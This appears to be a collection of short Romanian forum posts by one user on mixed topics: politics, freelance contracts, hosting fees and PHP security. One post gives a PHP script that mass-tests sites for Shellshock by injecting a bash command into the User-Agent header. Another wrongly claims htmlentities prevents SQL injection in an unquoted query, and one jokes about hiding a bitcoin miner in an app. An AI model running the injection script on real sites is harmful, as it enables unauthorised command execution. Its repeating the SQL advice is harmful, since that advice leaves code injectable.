Dragos

Pentru cei care il aleg pe Ponta

Eu vin cu zarurile.

Salutari, Caut un developer de flash pentru un amic pentru crearea unei aplicatii de videochat. Doritorii va rog lasati un raspuns daca ati mai facut asta pana acum sau alte proiecte asemanatoare in flash.

Mergi cu numaratul pixelilor din stanga sus. Facusem nebunia asta pentru un joc acum un an, doi si iti dadea si coordonatele. Ia scriptul si extrage-ti partea care te intereseaza.

S-a prajit de tot Valium. cc @aelius

Functia mysql_real_escape_string nu este suficienta pentru a bloca SQLi. Spre exemplu avem scriptul acesta $id = mysql_real_escape_string($_GET['id']); $sql = mysql_query("select * from tabel where ID=$id"); Daca introduc in GET "1 or 1=2" o sa se execute scriptul. Nu folosi nici scriptul lui @Geoutsu pentru ca se poate trece de el printr-un string codat in hexa. Cel mai usor foloseste htmlentities cu flag-ul ENT_QUOTES. $id = htmlentities($_GET['id'],ENT_QUOTES); $sql = mysql_query("select * from tabel where ID=$id");

L-am primit dupa cateva zile.

E ok ideea, dar macar daca se face, cel care doneaza sa aleaga cumva calumea cui sa-i dea in ideea in care respectivul chiar are nevoie de asta.

Ziceam si la mine pe blog, daca sunt programele de genul acum in varianta preview, ai putea sa incerci sa schimbi locul unde se trimit informatiile si ai toate datele despre om.

Sunt intentionat puse.

Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit. Mai rapid se poate face asa din consola. <?php $situri = array("http://site.ro/","http://site2.ro"); foreach($situri as $sit) { if(scaneaza($sit)) echo $sit . "\n"; } function scaneaza($url) { $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1; else return 0; } ?>

Din ce am inteles, oamenii de la GlobeHosting nu mai vor sa plateasca taxa de retragere a banilor din Paypal, asa ca te pun pe tine sa platesti si taxa aia. E taranism chestia asta.

In afara sa-l folosesti pe post de carpa sa mai stergi praful sau geamul de la masina, n-ai ce face cu el.

Sare pe filtrele de verificare ca nu ai content si returnezi 500 internal server error.

Pe bune? Flood? Edit: E up

Un mic tool pe care l-am scris in seara asta pentru a verifica daca un site e vulnerabil la CVE-2014-6271/CVE-2014-7169. Am I vulnerable to Shellshock / Bash bug? - Dragos Gaftoneanu

http://edition.cnn.com/2011/09/30/tech/social-media/facebook-charge-fee-ostrow/

Un 404 facut ca la carte

Creeaza fisierul 4char.txt si da-i permisiuni de citire/scriere pe el.

Astea sunt tampenii vechi de pe 4chan. De acolo a aparut si bula magica pentru apa.

Dupa ani si ani, plugin oficial de Wordpress https://wordpress.org/plugins/patch-for-revolution-slider/

Daca ai descarcat ceva de pe torrente, in ziua urmatoare vine politia la tine cu mandat.

Din cate stiu, astfel de contracte se fac cu semnatura olografa conform legii din Romania. Intreaba pe cineva care e jurist.

Ideea e buna, articolele sunt bune, dar tema pare prea incarcata.

Daca ai facut pe contract, citeste un pic clauzele contractului. Daca nu scrie vreo magarie, inseamna ca esti protejat si daca intri in instanta sau ceva, poti arata proiectul facut cap coada. Pastreaza ce ai facut in calculator pana se termina hora. Daca nu ai facut o parte din proiect, e nasol si au libertatea sa te acuze. Daca nu ai facut pe contract, n-ai treaba. Parerea mea e sa le mai trimiti o data proiectul.